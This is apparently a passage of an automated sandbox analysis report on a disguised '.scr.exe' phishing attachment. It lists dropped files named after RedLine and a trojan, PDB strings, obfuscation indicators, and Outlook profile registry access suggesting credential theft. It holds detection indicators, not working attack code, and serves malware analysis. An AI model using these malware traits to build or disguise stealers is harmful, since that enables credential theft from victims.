Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: powrprof.dll

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Static file information: File size 5948349 > 1048576

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000004.00000003.2465813409.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000003.00000003.1756263146.0000000005F80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000004.00000003.2535618348.0000000000950000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2550990774.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2537430293.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: microsofts.exe, 00000004.00000003.1874170797.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000004.00000003.2132562567.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: microsofts.exe, 00000004.00000003.1970375777.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000004.00000003.2273795210.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000004.00000003.2273795210.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000004.00000003.2291929777.00000000050F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000004.00000003.1874170797.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000004.00000003.1804702761.0000000006F10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000004.00000003.2609486912.0000000000960000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2600977787.0000000002200000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000004.00000003.1889865895.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: microsofts.exe, 00000004.00000003.1766272892.00000000007DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720096215.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720413615.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1753388462.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1752883994.0000000003D90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000004.00000003.2238300524.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000004.00000003.1920494717.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: microsofts.exe, 00000004.00000003.1920494717.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000004.00000003.2581195964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000004.00000003.2476925381.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2486068862.00000000006A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000004.00000003.2033704180.0000000006F00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000004.00000003.2327436015.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000004.00000003.2145606986.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: microsofts.exe, 00000004.00000003.1905105470.0000000006350000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1916280568.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000004.00000003.1781654069.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000004.00000003.2291929777.00000000050F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000004.00000003.2160142742.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000004.00000003.2145606986.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000004.00000003.2535618348.0000000000950000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2550990774.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2537430293.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000004.00000003.2238300524.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000004.00000003.2355859647.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000004.00000003.2132562567.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: microsofts.exe, 00000004.00000003.2609486912.0000000000960000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2600977787.0000000002200000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: microsofts.exe, 00000004.00000003.1854476964.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000004.00000003.1940610089.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000004.00000003.1859196474.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000004.00000003.1889865895.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000004.00000003.2439350097.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000004.00000003.1896655329.0000000006340000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1902674598.0000000005050000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1897809499.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000004.00000003.2581195964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000004.00000003.2414424613.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000004.00000003.2327436015.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: microsofts.exe, 00000004.00000003.1896655329.0000000006340000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1902674598.0000000005050000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1897809499.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000004.00000003.2420910878.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000004.00000003.2465813409.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000004.00000003.2355859647.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000004.00000003.1854476964.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000004.00000003.2476925381.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2486068862.00000000006A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720096215.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720413615.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1753388462.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1752883994.0000000003D90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: microsofts.exe, 00000004.00000003.2033704180.0000000006F00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: microsofts.exe, 00000004.00000003.1980310877.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000004.00000003.1980310877.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000004.00000003.2363749332.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: microsofts.exe, 00000004.00000003.1766237277.0000000005070000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: microsofts.exe, 00000004.00000003.1859196474.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000004.00000003.1781654069.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: microsofts.exe, 00000004.00000003.1766237277.0000000005070000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000004.00000003.1804702761.0000000006F10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: microsofts.exe, 00000004.00000003.1905105470.0000000006350000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1916280568.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000004.00000003.2160142742.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdbX source: microsofts.exe, 00000004.00000003.1970375777.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: microsofts.exe, 00000004.00000003.1940610089.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000004.00000003.2420910878.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000004.00000003.2363749332.00000000008D0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Native_Redline_BTC.exe.3.dr, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.svchost.exe.6800000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: appvcleaner.exe.4.dr

Static PE information: 0xBEAF7172 [Mon May 18 10:01:22 2071 UTC]

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,

0_2_0040EB70

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Static PE information: real checksum: 0xa2135 should be: 0x5b2ac2
Source: armsvc.exe.3.dr	Static PE information: real checksum: 0x32318 should be: 0x141787
Source: Native_Redline_BTC.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x9799b

Source: armsvc.exe.3.dr	Static PE information: section name: .didat
Source: IntegratedOffice.exe.4.dr	Static PE information: section name: .didat
Source: IntegratedOffice.exe.4.dr	Static PE information: section name: _RDATA
Source: OfficeC2RClient.exe.4.dr	Static PE information: section name: .didat
Source: OfficeC2RClient.exe.4.dr	Static PE information: section name: .detourc
Source: officesvcmgr.exe.4.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: .00cfg
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: _RDATA
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.4.dr	Static PE information: section name: .00cfg
Source: chrmstp.exe.4.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.4.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.4.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.4.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.4.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.4.dr	Static PE information: section name: malloc_h
Source: setup.exe.4.dr	Static PE information: section name: .00cfg
Source: setup.exe.4.dr	Static PE information: section name: .gxfg
Source: setup.exe.4.dr	Static PE information: section name: .retplne
Source: setup.exe.4.dr	Static PE information: section name: CPADinfo
Source: setup.exe.4.dr	Static PE information: section name: LZMADEC
Source: setup.exe.4.dr	Static PE information: section name: _RDATA
Source: setup.exe.4.dr	Static PE information: section name: malloc_h
Source: notification_helper.exe.4.dr	Static PE information: section name: .00cfg
Source: notification_helper.exe.4.dr	Static PE information: section name: .gxfg
Source: notification_helper.exe.4.dr	Static PE information: section name: .retplne
Source: notification_helper.exe.4.dr	Static PE information: section name: CPADinfo
Source: notification_helper.exe.4.dr	Static PE information: section name: _RDATA
Source: notification_helper.exe.4.dr	Static PE information: section name: malloc_h
Source: chrome_proxy.exe.4.dr	Static PE information: section name: .00cfg
Source: chrome_proxy.exe.4.dr	Static PE information: section name: .gxfg
Source: chrome_proxy.exe.4.dr	Static PE information: section name: .retplne
Source: chrome_proxy.exe.4.dr	Static PE information: section name: _RDATA
Source: chrome_proxy.exe.4.dr	Static PE information: section name: malloc_h
Source: FXSSVC.exe.4.dr	Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.4.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.4.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.4.dr	Static PE information: section name: .gehcont
Source: alg.exe.4.dr	Static PE information: section name: .didat
Source: GoogleUpdateComRegisterShell64.exe.4.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.4.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.4.dr	Static PE information: section name: .gehcont
Source: elevation_service.exe.4.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.4.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.4.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.4.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.4.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe0.4.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.4.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.4.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.4.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.4.dr	Static PE information: section name: malloc_h
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: section name: .retplne

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004171D1 push ecx; ret	0_2_004171E4
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004171D1 push ecx; ret	2_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004038DF pushfd ; ret	3_2_004038E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004068EF push ebp; ret	3_2_004068F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004030A3 push edx; ret	3_2_004030A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A852Eh; ret	3_2_052A7F3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8514h; ret	3_2_052A7F66
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A7E66h; ret	3_2_052A8057
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A817Ah; ret	3_2_052A808B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A82E5h; ret	3_2_052A80D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A826Ah; ret	3_2_052A819E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A849Ch; ret	3_2_052A81E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A805Ch; ret	3_2_052A8255
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8321h; ret	3_2_052A82E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A7FBFh; ret	3_2_052A831F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A7FA8h; ret	3_2_052A834C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A84BAh; ret	3_2_052A83E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8426h; ret	3_2_052A84D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8075h; ret	3_2_052A84FD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A808Ch; ret	3_2_052A8512
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8B6Fh; ret	3_2_052A8596
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8D45h; ret	3_2_052A87D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8AB5h; ret	3_2_052A8B13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8784h; ret	3_2_052A8CA1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8DC9h; ret	3_2_052A8E1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8D14h; ret	3_2_052A8E2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A8674h; ret	3_2_052A8E4D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A88A6h; ret	3_2_052A8F76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A8550 push 052A868Ch; ret	3_2_052A8FA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A7DF0 push 052A7D4Bh; ret	3_2_052A7D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052A7DF0 push 052A7DD7h; ret	3_2_052A7D9F

Source: Native_Redline_BTC.exe.3.dr	Static PE information: section name: .text entropy: 7.954598996291746
Source: appvcleaner.exe.4.dr	Static PE information: section name: .reloc entropy: 7.935649368853308
Source: Aut2exe.exe.4.dr	Static PE information: section name: .rsrc entropy: 7.800660406797518
Source: Aut2exe_x64.exe.4.dr	Static PE information: section name: .rsrc entropy: 7.800511460517213
Source: AutoIt3_x64.exe.4.dr	Static PE information: section name: .reloc entropy: 7.943942511952566
Source: SciTE.exe.4.dr	Static PE information: section name: .reloc entropy: 7.912333689161405
Source: IntegratedOffice.exe.4.dr	Static PE information: section name: .reloc entropy: 7.926776725780685
Source: jucheck.exe.4.dr	Static PE information: section name: .reloc entropy: 7.931087582579306
Source: OfficeC2RClient.exe.4.dr	Static PE information: section name: .reloc entropy: 7.716526540372571
Source: officesvcmgr.exe.4.dr	Static PE information: section name: .reloc entropy: 7.937225704368736
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: section name: .reloc entropy: 7.940599038437646
Source: chrmstp.exe.4.dr	Static PE information: section name: .reloc entropy: 7.9410103279415365
Source: setup.exe.4.dr	Static PE information: section name: .reloc entropy: 7.941028317629505
Source: notification_helper.exe.4.dr	Static PE information: section name: .reloc entropy: 7.941944744745806
